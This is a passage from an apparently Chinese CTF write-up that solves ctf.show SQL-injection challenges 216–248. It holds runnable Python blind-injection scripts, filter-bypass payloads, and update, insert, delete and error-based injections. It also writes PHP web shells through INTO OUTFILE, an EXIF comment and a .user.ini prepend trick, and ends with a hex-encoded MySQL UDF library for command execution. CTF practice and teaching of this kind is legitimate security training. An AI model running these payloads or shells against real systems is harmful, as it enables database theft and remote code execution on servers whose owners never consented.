    if start != 32:
        flag += chr(start)
        print(flag)
    else:
        break

216

查询语句
where id = from_base64($id);

import requests
 
url = 'http://8efafede-adba-4dff-8020-12393af13fb4.challenge.ctf.show/api/'
flag = ''
 
for i in range(1, 46):
    start = 32
    tail = 126
    while start < tail:
        mid = (start + tail) >> 1
        # payload = "select group_concat(table_name) from information_schema.tables where table_schema=database()"
        # payload = 'select group_concat(column_name) from information_schema.columns where table_name="ctfshow_flagxcc"'
        payload = 'select group_concat(flagaac) from ctfshow_flagxcc'
        data = {
            'ip': f"'MQ==') or if(ascii(substr(({payload}), {i}, 1))>{mid},sleep(1), 1",
            'debug': '0'
        }
        try:
            res = requests.post(url, data=data, timeout=1)
            tail = mid
        except Exception as e:
            start = mid + 1
    if start != 32:
        flag += chr(start)
        print(flag)
    else:
        break

217

//查询语句
where id = ($id);

//屏蔽危险分子
function waf($str){
	return preg_match('/sleep/i',$str);
}   

可以使用 benchmark 来替代 sleep。同样可以达到延迟时间的目的。

BENCHMARK(count,expr)
benchmark函数会重复计算expr表达式count次

但是一直跑可能会出错，所以可以加个 time.sleep(0.2) 休息一下。

import time
 
import requests
 
url = 'http://39110013-bc10-4ec0-8831-30401b332be5.challenge.ctf.show/api/'
flag = ''
 
for i in range(1, 46):
    start = 32
    tail = 126
    while start < tail:
        mid = (start + tail) >> 1
        # payload = "select group_concat(table_name) from information_schema.tables where table_schema=database()"
        # payload = 'select group_concat(column_name) from information_schema.columns where table_name="ctfshow_flagxccb"'
        payload = 'select group_concat(flagaabc) from ctfshow_flagxccb'
        data = {
            'ip': f"1) or if(ascii(substr(({payload}), {i}, 1))>{mid},benchmark(1000000,md5(1)), 1",
            'debug': '0'
        }
        try:
            res = requests.post(url, data=data, timeout=0.5)
            tail = mid
        except Exception as e:
            start = mid + 1
        time.sleep(0.2)
    if start != 32:
        flag += chr(start)
        print(flag)
    else:
        break

218

//查询语句
where id = ($id);

//屏蔽危险分子
function waf($str){
	return preg_match('/sleep|benchmark/i',$str);
}

用笛卡尔积盲注

import time

import requests

url = "http://a50e4405-bdf0-49c6-b928-361814cea706.challenge.ctf.show/api/"
# 表名 ctfshow_flagxc,ctfshow_info
# payload = "ascii(mid((select group_concat(table_name) from information_schema.tables where table_schema=database()),{},1))>{}"
# 列名 id,flagaac
# payload = "ascii(mid((select group_concat(column_name) from information_schema.columns where table_schema=database()),{},1))>{}"
# flag
payload = "ascii(mid((select flagaac from ctfshow_flagxc),{},1))>{}"


def valid_payload(p: str) -> bool:
    data = {
        "debug": 0,
        "ip": f"if({p},(select count(*) from information_schema.columns A,information_schema.tables B"
              f",information_schema.tables C),1) "
    }
    time_s = time.time()
    _ = requests.post(url, data=data)
    time_e = time.time()
    # 改用手动计时防止多次没跑完的笛卡尔积叠加卡死影响注入
    return time_e-time_s > 2


index = 1
result = ""

while True:
    start = 32
    end = 127
    while not(abs(start - end) == 1 or start == end):
        everage = (start + end) // 2
        if valid_payload(payload.format(index, everage)):
            start = everage
        else:
            end = everage
    if end < start:
        end = start
    if chr(end) == "!":
        break
    result += chr(end)
    print(f"[*] result: {result}")
    index += 1

import requests
url = "http://a50e4405-bdf0-49c6-b928-361814cea706.challenge.ctf.show/api/"

strr = '_1234567890{}-qazwsxedcrfvtgbyhnujmikolp,'
# payload = "select table_name from information_schema.tables where table_schema=database() limit 0,1"
# payload = "select column_name from information_schema.columns where table_name='ctfshow_flagxc' limit 1,1"
payload = "select flagaac from ctfshow_flagxc"
res = ""
cnt = 1;
while True:
	print(cnt)
	for i in strr:
		data = {
			'ip': f"1) or if(substr(({payload}),{cnt},1)='{i}',(SELECT count(*) FROM information_schema.tables A, information_schema.schemata B, information_schema.schemata D, information_schema.schemata E, information_schema.schemata F,information_schema.schemata G, information_schema.schemata H),1",
			'debug': '1'
		}
		try:
			r = requests.post(url, data=data, timeout=0.5)
		except Exception as e:
			res += i
			print('[*]'+res)
			cnt += 1
			break

219

//查询语句
where id = ($id);

//屏蔽危险分子
function waf($str){
	return preg_match('/sleep|benchmark|rlike/i',$str);
}   

import requests
url = "http://167c24a6-0863-4d25-9301-18a37ff55e00.challenge.ctf.show/api/"

strr = "_1234567890{}-qazwsxedcrfvtgbyhnujmikolp,"
# payload = "select table_name from information_schema.tables where table_schema=database() limit 0,1"
# payload = "select column_name from information_schema.columns where table_name='ctfshow_flagxca' limit 1,1"
payload = "select flagaabc from ctfshow_flagxca"
cnt = 1
res = ""
while True:
	print(cnt)
	for i in strr:
		data = {
			'ip': f"1) or if(substr(({payload}),{cnt},1)='{i}',(SELECT count(*) FROM information_schema.tables A, information_schema.schemata B, information_schema.schemata D, information_schema.schemata E, information_schema.schemata F,information_schema.schemata G, information_schema.schemata H, information_schema.schemata I),1",
			'debug': '1'
        }
		try:
			r = requests.post(url, data=data, timeout=2)
		except Exception as e:
			res += i
			print('[*]'+res)
			cnt+=1
			break

220

//查询语句
where id = ($id);

//屏蔽危险分子
function waf($str){
	return preg_match('/sleep|benchmark|rlike|ascii|hex|concat_ws|concat|mid|substr/i',$str);
}

import requests
url = "http://e47ee4e7-c885-4e83-9b94-9a98c7698afd.challenge.ctf.show/api/"

strr = "_1234567890{}-qazwsxedcrfvtgbyhnujmikolp"
# payload = "select table_name from information_schema.tables where table_schema=database() limit 0,1"
# payload = "select column_name from information_schema.columns where table_name='ctfshow_flagxcac' limit 1,1"
payload = "select flagaabcc from ctfshow_flagxcac"
cnt = 1
res = ""
while True:
    print(cnt)
    for i in strr:
        res += i
        data = {
            'ip': f"1) or if(left(({payload}),{cnt})='{res}',(SELECT count(*) FROM information_schema.tables A, information_schema.schemata B, information_schema.schemata D, information_schema.schemata E, information_schema.schemata F,information_schema.schemata G, information_schema.schemata H),1",
            'debug': '1'
        }
        # print(i)
        try:
            r = requests.post(url, data=data, timeout=0.5)
            res = res[:-1]
        except Exception as e:
            print('[*]'+res)
            cnt+=1
            break

221

//分页查询
$sql = select * from ctfshow_user limit ($page-1)*$limit,$limit;

利用procedure analyse()函数优化表结构。

procesure analyse(max_elements,max_memory)
max_elements
指定每列非重复值的最大值，当超过这个值的时候，MySQL不会推荐enum类型。
max_memory
analyse()为每列找出所有非重复值所采用的最大内存大小。

利用 ExtractValue 的报错，获得数据库名。

ExtractValue(xml_frag, xpath_expr)

/api/?page=1&limit=1 procedure analyse(extractvalue(1,concat(0x7e,database(),0x7e)),1)

222

//查询语句
$sql = select * from ctfshow_user group by $username;

开始尝试的是group by报错注入，但是注不出来，最后还是用的盲注。

如果if语句里的条件不满足就返回 username ，因此我们可以根据 group by username 的返回结果去判断我们if语句里的内容是否成立。

import requests
 
url = 'http://ad25ea25-707b-4d0b-aa39-7e30a542c917.challenge.ctf.show/api/'
flag = ''
i = 0
 
while True:
    start = 32
    tail = 127
    i += 1
 
    while start < tail:
        mid = (start + tail) >> 1
        # payload = 'select group_concat(table_name) from information_schema.tables where table_schema=database()'
        # payload = "select group_concat(column_name) from information_schema.columns where table_name='ctfshow_flaga'"
        payload = 'select concat(flagaabc) from ctfshow_flaga'
        data = {'u': f"if(ascii(substr(({payload}),{i},1))>{mid},username,'a')"}
        res = requests.get(url, params=data)
        if "userAUTO" in res.text:
            start = mid + 1
        else:
            tail = mid
    if start != 32:
        flag += chr(start)
    else:
        break
    print(flag)

223

//查询语句
$sql = select * from ctfshow_user group by $username;

//TODO:很安全，不需要过滤
//用户名不能是数字

在上一题的基础上加了过滤，不能包含数字。可以使用 true 来绕过，一个 true 表示1，数字就用 true 来累加就可以了。

import requests 
url = 'http://5c2a899b-dfaa-42fa-84cb-7542c7f597de.challenge.ctf.show//api/'
flag = ''
i = 0

def numTrue(number):
    result = 'true'
    if number == 1:
        return result
    else:
        for index in range(number - 1):
            result += '+true'
        return result

while True:
    start = 32
    tail = 127
    i += 1
 
    while start < tail:
        mid = (start + tail) >> 1
        # payload = 'select group_concat(table_name) from information_schema.tables where table_schema=database()'
        # payload = "select group_concat(column_name) from information_schema.columns where table_name='ctfshow_flagas'"
        payload = 'select concat(flagasabc) from ctfshow_flagas'
        data = {'u': f"if(ascii(substr(({payload}),{numTrue(i)},{numTrue(1)}))>{numTrue(mid)},username,'a')"}
        res = requests.get(url, params=data)
        if "userAUTO" in res.text:
            start = mid + 1
        else:
            tail = mid
    if start != 32:
        flag += chr(start)
    else:
        break
    print(flag)

224

提示：

不需要爆破、扫描
没有源码泄露
登陆不上去找txt

考点：Recon、EXIF、SQLi

fuzz之后发现无法注入，在robots.txt找到hint：

User-agent: *
Disallow: /pwdreset.php

然后在这个pwdreset里面可以重置密码，直接充值一下密码然后登陆就可以了（fuzz这个重置密码也没有找到注入点），登陆之后发现是上传：

测试发现，不管是什么文件名，最后都成为了md5.zip的格式，点击即可下载，虽然只是简单重命名并没有进行zip压缩

经过接近30min的测试，都没有bypass这个zip后缀，然后我对同一个包进行重放发现也会生成多个不同文件名的文件，所以md5应该是直接哈希了和时间有关的东西或者是随机数。

除此之外，还会检测文件的类型以及换行，并以列表形式显示出来：

简单fuzz之后就应该知道不是个上传getshell题目，结合题目名考虑还是注入。之前xctf有过文件名注入的题目，将文件名insert插入数据库，就造成了注入，比如可以使用类似这样Payload的报错注入:

1' or updatexml() or '1

我猜测本题目可能也是这样考的，把源文件名存进数据库然后保存成md5.zip，但是测试了很多种不同的payload组合，都是失败了，所以考点可能也不在这里。

之后我注意到了filetype和换行，对于换行这个东西没有什么想法，filetype的话很可能是存入数据库的，如果能够欺骗PHP的文件类型检测，就可以插入SQL语句造成注入了，问题在于如何做到，以及此方法是否可行都是未知数

后来发现，它很有可能是使用了finfo类下的file()方法进行检测才输出了这样的结果，然而查了好久也没查到有相关的信息：

然后我决定去手撕PHP的C源码，看到不是特别明白这里就不说了，但是发现这个file()方法可以检测图片的EXIF信息，而EXIF信息中有一个comment字段，相当于图片注释，而finfo->file()正好能够输出这个信息，如果上面的假设成立，这就可以造成SQL注入

然后根据之前xctf的那个文件名注入的题目的sql语句，猜测本题目的语句应该大概是这样的：

insert into column(name, type, lineFeed) values ($filename, $filetype, $filelinefeed);

所以需要先构造这个insert语句闭合。insert不能联合查询什么的，不过也不用去专门构造Payload，只要堆叠注入就可以了。

因为filelist里面是输出的文件信息，应该是上传时候insert进去的，然而对insert堆叠并不能更新数据库信息，这样就没有回显，无回显的话只能靠延时了，先弄个延时测试一下吧

之后就是下一个问题，如何更新exif信息？可以使用exiftool工具，Payload：

exiftool -overwrite_original -comment="y1ng\"');select if(1,sleep(20),sleep(20));--+" y1ng.jpg

之后直接file命令就可以看到comment:

当然用EXIF在线查看器也可以：

之后就是上传，如果可以造成注入，那么应该就可以直接延时，上传发现果然延时成功了，说明可以注入

现在是注入点找到了，也没有任何过滤，下一步做什么？时间盲注？根本不现实，因为一个Payload代表这要生成一次新的图片+上传一个新的图片，过于复杂，所以考虑直接getshell，Payload：

exiftool -overwrite_original -comment="y1ng\"');select 0x3C3F3D60245F504F53545B305D603B into outfile '/var/www/html/1.php';--+"

其中select后面的16进制转一下字符串为

<?=`$_POST[0]`;

因为我最开始是直接把一句话木马转16进制然后用了这个Payload，然而outfile后面路径到/v后面就没了，应该是太长了：

所以用一个尽量短的php脚本，更新exif，上传，即可直接getshell：

225

//查询语句
$sql = "select id,username,pass from ctfshow_user where username = '{$username}';";

if(preg_match('/file|into|dump|union|select|update|delete|alter|drop|create|describe|set/i',$username)){
	die(json_encode($ret));
}

方法一：handler

过滤了 select ，可以使用 handler 来进行查询。

mysql除可使用select查询表中的数据，也可使用handler语句，这条语句使我们能够一行一行的浏览一个表中的数据，不过handler语句并不具备select语句的所有功能。它是mysql专用的语句，并没有包含到SQL标准中。 

通过HANDLER tbl_name OPEN打开一张表，无返回结果，实际上我们在这里声明了一个名为tb1_name的句柄。

通过HANDLER tbl_name READ FIRST获取句柄的第一行，通过READ NEXT依次获取其它行。最后一行执行之后再执行NEXT会返回一个空的结果。

没有过滤show

?username=1';show tables;

用handler读取

?username=1';handler ctfshow_flagasa open;handler ctfshow_flagasa read first;

方法二：预处理

利用concat绕过一切过滤，之后就是替换后面的database()为想要执行的语句即可，别忘了加空格，对于不知道啥是预处理的可以看看我这篇博客，SQL注入随便注(三种姿势)

username=1';PREPARE a from concat('s','elect', ' database()');EXECUTE a;

当然concat(char(115,101,108,101,99,116)也可以代替select

226、228-230

//查询语句
$sql = "select id,username,pass from ctfshow_user where username = '{$username}';";

if(preg_match('/file|into|dump|union|select|update|delete|alter|drop|create|describe|set|show|\(/i',$username)){
	die(json_encode($ret));
}

?username=';PREPARE a from 0x73686F77207461626C6573;EXECUTE a;
0x73686F77207461626C6573 => show tables

?username=';PREPARE a from 0x73656c656374202a2066726f6d2063746673685f6f775f666c616761733b;EXECUTE a;
0x73656c656374202a2066726f6d2063746673685f6f775f666c616761733b => select * from ctfsh_ow_flagas;

?username=1';handler ctfsh_ow_flagas open;handler ctfsh_ow_flagas read first;

227

$sql = "select id,username,pass from ctfshow_user where username = '{$username}';";

if(preg_match('/file|into|dump|union|select|update|delete|alter|drop|create|describe|set|show|db|\,/i',$username)){
	die(json_encode($ret));
}

查看MySQL的 Stored Procedure （被差劲地翻译为 存储过程，我更愿意称之为 "存储好了的程序"）。

MySQL 5.0 版本开始支持 Stored Procedure 。

Stored Procedure 是一种在数据库中存储复杂程序，以便外部程序调用的一种数据库对象。

Stored Procedure 是为了完成特定功能的SQL语句集，经编译创建并保存在数据库中，用户可通过指定 Stored Procedure 的名字并给定参数(需要时)来调用执行。

Stored Procedure 思想上很简单，就是数据库 SQL 语言层面的代码封装与重用。

在mysql中， Stored Procedure 和函数的信息存储在 information_schema 数据库下的 Routines 表中，可以通过查询该表的记录来查询 Stored Procedure 和函数的信息。

?username=1';PREPARE a from 0x73656c656374202a2066726f6d20696e666f726d6174696f6e5f736368656d612e726f7574696e6573;EXECUTE a;

0x73656c656374202a2066726f6d20696e666f726d6174696f6e5f736368656d612e726f7574696e6573 => select * from information_schema.routines

可直接看到flag，也可以知道函数名，通过 call getFlag(); 获得flag

update

231

$sql = "update ctfshow_user set pass = '{$password}' where username = '{$username}';";

尝试输入

password=user',username=database() where 1=1#&username=1

此时的SQL语句就变为了：

update ctfshow_user set pass = 'user',username=database() where 1=1#' where username = '1';

然后到update.php中发现username全变为了数据库名。

之后就可以逐个查表名，字段名和字段内容了。

password=user',username=(select group_concat(table_name) from information_schema.tables where table_schema=database()) where 1=1#&username=1

password=user',username=(select group_concat(column_name) from information_schema.columns where table_name='flaga') where 1=1#&username=1

password=user',username=(select flagas from flaga) where 1=1#&username=1

232

$sql = "update ctfshow_user set pass = md5('{$password}') where username = '{$username}';";

就是多了个md5函数，闭合一下括号就可以了。

password=user'),username=(select group_concat(table_name) from information_schema.tables where table_schema=database()) where 1=1#&username=1

password=user'),username=(select group_concat(column_name) from information_schema.columns where table_name='flagaa') where 1=1#&username=1

password=user'),username=(select flagass from flagaa) where 1=1#&username=1

233

$sql = "update ctfshow_user set pass = '{$password}' where username = '{$username}';";

这道题SQL语句和231一样，但是不管输入什么都查询失败，所以使用盲注。这里的sleep，是每行都会执行一次，所以要计算好时间。

import requests
url = "http://a5df7cce-87d5-4270-b8e5-0c61d0307a39.challenge.ctf.show/api/?page=1&limit=10"
result = ""
i = 0

while True:
    i = i + 1
    head = 32
    tail = 127

    while head < tail:
        mid = (head + tail) >> 1
        # 查数据库
        # payload = "select group_concat(table_name) from information_schema.tables where table_schema=database()"
        # 查表名
        # payload = "select column_name from information_schema.columns where table_name='flag233333' limit 1,1"
        # 查数据
        payload = "select flagass233 from flag233333"
        data = {
            'username': f"1' or if(ascii(substr(({payload}),{i},1))>{mid},sleep(0.05),1)#",
            'password': '4'
        }
        try:
            r = requests.post(url, data=data, timeout=0.9)
            tail = mid
        except Exception as e:
            head = mid + 1
    if head != 32:
        result += chr(head)
    else:
        break
    print(result

234

$sql = "update ctfshow_user set pass = '{$password}' where username = '{$username}';";

原来的语句是

$sql = "update ctfshow_user set pass = '{$password}' where username = '{$username}';";

但是传入单引号后

$sql = "update ctfshow_user set pass = '\' where username = 'username';";

这样pass里面的内容就是' where username =,接下来username里面的参数就是可以控制的了

username=,username=(select group_concat(table_name) from information_schema.columns where table_schema=database())-- &password=\

username=,username=(select group_concat(column_name) from information_schema.columns where table_name=0x666c6167323361)-- &password=\

username=,username=(select flagass23s3 from flag23a)-- &password=\

235

$sql = "update ctfshow_user set pass = '{$password}' where username = '{$username}';";
//过滤 or ' 

information_schema没法用了，因为 or ...

username=,username=(select group_concat(table_name) from mysql.innodb_table_stats where database_name=database())-- - &password=\

# 无列名注入
username=,username=(select b from (select a,b,c union select * from flag23a1 limit 1,1)d)-- &password=\

236

$sql = "update ctfshow_user set pass = '{$password}' where username = '{$username}';";

// 过滤 or ' flag

// 估计是结果过滤了flag，但这儿flag格式是ctfshow{}...
// 预计是编码绕过对返回数据的过滤

username=,username=(select group_concat(table_name) from mysql.innodb_table_stats where database_name=database())-- &password=\
// 返回 banlist,ctfshow_user,flaga

username=,username=(select to_base64(b) from (select 1,2 as b,3 union select * from flaga limit 1,1)a)-- &password=\

username=,username=(select hex(b) from (select 1,2 as b,3 union select * from flaga limit 1,1)a)-- &password=\

insert

237

$sql = "insert into ctfshow_user(username,pass) value('{$username}','{$password}');";

由于他会将所有的数据都展示出来，所以我们可以构造修改插入的数据进行注入：

username=1',(select group_concat(table_name) from information_schema.tables where table_schema=database()))#&password=2

这样一来执行的SQL语句就变为了：

insert into ctfshow_user(username,pass) value('1',(select group_concat(table_name) from information_schema.tables where table_schema=database()))#','2');

插入的原密码处的数据就变为了查询语句返回的内容，就可以直接查询我们想要查询的内容了。

username=1',(select group_concat(table_name) from information_schema.tables where table_schema=database()))#&password=2
username=1',(select group_concat(column_name) from information_schema.columns where table_name="flag"))#&password=2
username=1',(select flagass23s3 from flag))#&password=2

username=1',(select group_concat(table_name) from mysql.innodb_table_stats where database_name=database()));#
password=2
查数据——无列名查询
1',(select b from (select 1,2 as b,3 union select * from flag limit 1,1)a));#

238

$sql = "insert into ctfshow_user(username,pass) value('{$username}','{$password}');";
//过滤空格

// 括号包裹
username=1',(select(group_concat(table_name))from(information_schema.tables)where(table_schema=database())))#&password=2

username=1',(select(group_concat(column_name))from(information_schema.columns)where(table_name="flagb")))#&password=2

username=1',(select(flag)from(flagb)))#&password=2

239

$sql = "insert into ctfshow_user(username,pass) value('{$username}','{$password}');";
//过滤空格

//information_schema表不能用了，参照web235的无列名注入。

username=1',(select(group_concat(table_name))from(mysql.innodb_table_stats)where(database_name=database())));#

// *被过滤,只能去猜列名

username=1',(select(flag)from(flagbb)))#&password=2

240

$sql = "insert into ctfshow_user(username,pass) value('{$username}','{$password}');";

//过滤空格 or sys mysql

import requests
 
url = 'http://a47c98f4-72a4-4558-bf93-c9082f8d0491.challenge.ctf.show/api/insert.php'
flag_url = 'http://a47c98f4-72a4-4558-bf93-c9082f8d0491.challenge.ctf.show/api/?desc=&page=1&limit=1000'
 
data = {'username': '', 'password': '2'}
 
for i in range(32):
    string = bin(i).replace('0b', '').rjust(5, '0')
    table = 'flag'
    for j in string:
        table += chr(int(j, 10) + ord('a'))
    data['username'] = f"1',(select(flag)from({table})))#"
    res = requests.post(url, data)
    res2 = requests.get(flag_url)
    if 'ctfshow{' in res2.text:
        print(table)
        break

delete

241

$sql = "delete from  ctfshow_user where id = {$id}";

from time import sleep
 
import requests
 
url = 'http://8eb8267d-06ca-4001-83e3-a9cadbe414f0.challenge.ctf.show/api/delete.php'
i = 0
data = {'id': ''}
flag = ''
 
while True:
    start = 32
    tail = 127
    i += 1
    while start < tail:
        mid = (start + tail) >> 1
        # payload = 'select group_concat(table_name) from information_schema.tables where table_schema=database()'
        # payload = 'select group_concat(column_name) from information_schema.columns where table_name="flag"'
        payload = 'select flag from flag'
        data['id'] = f'-1 or if(ascii(substr(({payload}),{i},1))>{mid},sleep(0.05),0)#'
        try:
            res = requests.post(url, data, timeout=0.9)
            tail = mid
        except Exception as e:
            start = mid + 1
        sleep(1)
    if start != 32:
        flag += chr(start)
        print(flag)
    else:
        break

file

242

//备份表
$sql = "select * from ctfshow_user into outfile '/var/www/html/dump/{$filename}';";

SELECT ... INTO OUTFILE 'file_name'
        [CHARACTER SET charset_name]
        [export_options]

export_options:
    [{FIELDS | COLUMNS}
        [TERMINATED BY 'string']//分隔符
        [[OPTIONALLY] ENCLOSED BY 'char']
        [ESCAPED BY 'char']
    ]
    [LINES
        [STARTING BY 'string']
        [TERMINATED BY 'string']
    ]

"OPTION"参数为可选参数选项，其可能的取值有：

FIELDS TERMINATED BY '字符串'：设置字符串为字段之间的分隔符，可以为单个或多个字符。默认值是"\t"。

FIELDS ENCLOSED BY '字符'：设置字符来括住字段的值，只能为单个字符。默认情况下不使用任何符号。

FIELDS OPTIONALLY ENCLOSED BY '字符'：设置字符来括住CHAR、VARCHAR和TEXT等字符型字段。默认情况下不使用任何符号。

FIELDS ESCAPED BY '字符'：设置转义字符，只能为单个字符。默认值为"\"。

LINES STARTING BY '字符串'：设置每行数据开头的字符，可以为单个或多个字符。默认情况下不使用任何字符。

LINES TERMINATED BY '字符串'：设置每行数据结尾的字符，可以为单个或多个字符。默认值是"\n"。

可以写马的参数有：

FIELDS TERMINATED BY 'str'
LINES STARTING BY 'str'
LINES TERMINATED BY 'str'

filename=1.php' LINES STARTING BY "<?php eval($_POST[cmd]);?>";#

243

//备份表
$sql = "select * from ctfshow_user into outfile '/var/www/html/dump/{$filename}';";

//过滤了php

/*
这题在上一题的基础上增加了过滤，把 php 过滤了。

这样的话没办法写入PHP文件了，结合文件上传的知识，/dump/下还有一个 index.php 文件，那么我们就可以上传一个 .user.ini 文件，将包含恶意代码的其他文件包含到当前路径下的PHP文件中，也可以达到写马的目的。

可以先上传 .user.ini 文件，这里在每行开头加上换行符避免与前面插入的内容混在一起。
然后上传包含恶意代码的文件，然后访问/dump/index.php就可以执行命令了。
*/

filename=.user.ini' LINES STARTING BY ';' TERMINATED BY 0x0a6175746f5f70726570656e645f66696c653d312e6a70670a6175746f5f617070656e645f66696c653d312e6a70670a;#

filename=1.jpg' FIELDS TERMINATED BY 0x3c3f706870206576616c28245f504f53545b315d293b3f3e;#

error

更多见 报错注入.md

244

$sql = "select id,username,pass from ctfshow_user where id = '".$id."' limit 1;";

api/?id=1' and updatexml(1,concat(0x7e,(select database()),0x7e),2)%23

api/?id=1' and updatexml(1,concat(0x7e,(select group_concat(table_name) from information_schema.tables where table_schema=database()),0x7e),1)%23

api/?id=1' and updatexml(1,concat(0x7e,(select group_concat(column_name) from information_schema.columns where table_name='ctfshow_flag'),0x7e),1)%23

api/?id=1' and updatexml(1,concat(0x7e,(select flag from ctfshow_flag),0x7e),1)%23

回显长度有限制，使用mid、left、right、substr等函数截取
api/?id=1' and updatexml(1,concat(0x7c,mid((select flag from ctfshow_flag),1,30)),1) %23

api/?id=1' and updatexml(1,concat(0x7c,mid((select flag from ctfshow_flag),31,30)),1) %23

245

$sql = "select id,username,pass from ctfshow_user where id = '".$id."' limit 1;";

//过滤updatexml

1' or extractvalue(rand(),concat(0x7e,(select group_concat(table_name)from information_schema.tables where table_schema=database())));--+

1' or extractvalue(rand(),concat(0x7e,(select group_concat(column_name)from information_schema.columns where table_schema=database()and table_name='ctfshow_flagsa')));--+

1' or extractvalue(rand(),concat(0x7e,(select group_concat(flag1)from ctfshow_flagsa)));--+

1' or extractvalue(rand(),concat(0x7e,substr((select group_concat(flag1)from ctfshow_flagsa),1,25)));--+

1' or extractvalue(rand(),concat(0x7e,substr((select group_concat(flag1)from ctfshow_flagsa),26,25)));--+

246

$sql = "select id,username,pass from ctfshow_user where id = '".$id."' limit 1;";
//过滤updatexml extractvalue

1' and (select 1 from (select count(*),concat((select (table_name) from information_schema.tables where table_schema=database() limit 1,1),floor(rand(0)*2))x from information_schema.tables group by x)a);--+

1' and (select 1 from (select count(*),concat((select (column_name) from information_schema.columns where table_schema=database() and table_name="ctfshow_flags" limit 1,1),floor(rand(0)*2))x from information_schema.tables group by x)a);--+

1' and (select 1 from (select count(*),concat((select flag2 from ctfshow_flags),floor(rand(0)*2))x from information_schema.tables group by x)a);--+

247

$sql = "select id,username,pass from ctfshow_user where id = '".$id."' limit 1;";
//过滤updatexml extractvalue floor

1' and (select 1 from (select count(*),concat((select table_name from information_schema.tables where table_schema=database() limit 1,1),ceil(rand(0)*2))x from information_schema.tables group by x)a) %23

1' and (select 1 from (select count(*),concat((select column_name from information_schema.columns where table_schema=database() limit 3,1),ceil(rand(0)*2))x from information_schema.tables group by x)a) %23

1' and (select 1 from (select count(*),concat((select `flag?` from ctfshow_flagsa),ceil(rand(0)*2))x from information_schema.tables group by x)a) %23

' union select 1,count(*),concat((select `flag?` from ctfshow_flagsa limit 0,1),ceil(rand(0)*2))a from information_schema.columns group by a-- -

eval

248

//UDF注入
$sql = "select id,username,pass from ctfshow_user where id = '".$id."' limit 1;";

CREATE FUNCTION sys_eval RETURNS STRING SONAME 'udf.so'; //导入udf函数

import requests

base_url="http://8df48e3a-006f-4c37-b9d9-efbb9927edf2.challenge.ctf.show:8080/api/"
payload = []
text = ["a", "b", "c", "d", "e"]
udf = "7F454C4602010100000000000000000003003E0001000000800A000000000000400000000000000058180000000000000000000040003800060040001C0019000100000005000000000000000000000000000000000000000000000000000000C414000000000000C41400000000000000002000000000000100000006000000C814000000000000C814200000000000C8142000000000004802000000000000580200000000000000002000000000000200000006000000F814000000000000F814200000000000F814200000000000800100000000000080010000000000000800000000000000040000000400000090010000000000009001000000000000900100000000000024000000000000002400000000000000040000000000000050E574640400000044120000000000004412000000000000441200000000000084000000000000008400000000000000040000000000000051E5746406000000000000000000000000000000000000000000000000000000000000000000000000000000000000000800000000000000040000001400000003000000474E5500D7FF1D94176ABA0C150B4F3694D2EC995AE8E1A8000000001100000011000000020000000700000080080248811944C91CA44003980468831100000013000000140000001600000017000000190000001C0000001E000000000000001F00000000000000200000002100000022000000230000002400000000000000CE2CC0BA673C7690EBD3EF0E78722788B98DF10ED971581CA868BE12BBE3927C7E8B92CD1E7066A9C3F9BFBA745BB073371974EC4345D5ECC5A62C1CC3138AFF3B9FD4A0AD73D1C50B5911FEAB5FBE1200000000000000000000000000000000000000000000000000000000000000000300090088090000000000000000000000000000010000002000000000000000000000000000000000000000250000002000000000000000000000000000000000000000CD00000012000000000000000000000000000000000000001E0100001200000000000000000000000000000000000000620100001200000000000000000000000000000000000000E30000001200000000000000000000000000000000000000B90000001200000000000000000000000000000000000000680100001200000000000000000000000000000000000000160000002200000000000000000000000000000000000000540000001200000000000000000000000000000000000000F00000001200000000000000000000000000000000000000B200000012000000000000000000000000000000000000005A01000012000000000000000000000000000000000000005201000012000000000000000000000000000000000000004C0100001200000000000000000000000000000000000000E800000012000B00D10D000000000000D1000000000000003301000012000B00A90F0000000000000A000000000000001000000012000C00481100000000000000000000000000007800000012000B009F0B0000000000004C00000000000000FF0000001200090088090000000000000000000000000000800100001000F1FF101720000000000000000000000000001501000012000B00130F0000000000002F000000000000008C0100001000F1FF201720000000000000000000000000009B00000012000B00480C0000000000000A000000000000002501000012000B00420F0000000000006700000000000000AA00000012000B00520C00000000000063000000000000005B00000012000B00950B0000000000000A000000000000008E00000012000B00EB0B0000000000005D00000000000000790100001000F1FF101720000000000000000000000000000501000012000B00090F0000000000000A00000000000000C000000012000B00B50C000000000000F100000000000000F700000012000B00A20E00000000000067000000000000003900000012000B004C0B0000000000004900000000000000D400000012000B00A60D0000000000002B000000000000004301000012000B00B30F0000000000005501000000000000005F5F676D6F6E5F73746172745F5F005F66696E69005F5F6378615F66696E616C697A65005F4A765F5265676973746572436C6173736573006C69625F6D7973716C7564665F7379735F696E666F5F696E6974006D656D637079006C69625F6D7973716C7564665F7379735F696E666F5F6465696E6974006C69625F6D7973716C7564665F7379735F696E666F007379735F6765745F696E6974007379735F6765745F6465696E6974007379735F67657400676574656E76007374726C656E007379735F7365745F696E6974006D616C6C6F63007379735F7365745F6465696E69740066726565007379735F73657400736574656E76007379735F657865635F696E6974007379735F657865635F6465696E6974007379735F657865630073797374656D007379735F6576616C5F696E6974007379735F6576616C5F6465696E6974007379735F6576616C00706F70656E007265616C6C6F63007374726E6370790066676574730070636C6F7365006C6962632E736F2E36005F6564617461005F5F6273735F7374617274005F656E6400474C4942435F322E322E3500000000000000000000020002000200020002000200020002000200020002000200020001000100010001000100010001000100010001000100010001000100010001000100010001000100010001006F0100001000000000000000751A6909000002009101000000000000F0142000000000000800000000000000F0142000000000007816200000000000060000000200000000000000000000008016200000000000060000000300000000000000000000008816200000000000060000000A0000000000000000000000A81620000000000007000000040000000000000000000000B01620000000000007000000050000000000000000000000B81620000000000007000000060000000000000000000000C01620000000000007000000070000000000000000000000C81620000000000007000000080000000000000000000000D01620000000000007000000090000000000000000000000D816200000000000070000000A0000000000000000000000E016200000000000070000000B0000000000000000000000E816200000000000070000000C0000000000000000000000F016200000000000070000000D0000000000000000000000F816200000000000070000000E00000000000000000000000017200000000000070000000F00000000000000000000000817200000000000070000001000000000000000000000004883EC08E8EF000000E88A010000E8750700004883C408C3FF35F20C2000FF25F40C20000F1F4000FF25F20C20006800000000E9E0FFFFFFFF25EA0C20006801000000E9D0FFFFFFFF25E20C20006802000000E9C0FFFFFFFF25DA0C20006803000000E9B0FFFFFFFF25D20C20006804000000E9A0FFFFFFFF25CA0C20006805000000E990FFFFFFFF25C20C20006806000000E980FFFFFFFF25BA0C20006807000000E970FFFFFFFF25B20C20006808000000E960FFFFFFFF25AA0C20006809000000E950FFFFFFFF25A20C2000680A000000E940FFFFFFFF259A0C2000680B000000E930FFFFFFFF25920C2000680C000000E920FFFFFF4883EC08488B05ED0B20004885C07402FFD04883C408C390909090909090909055803D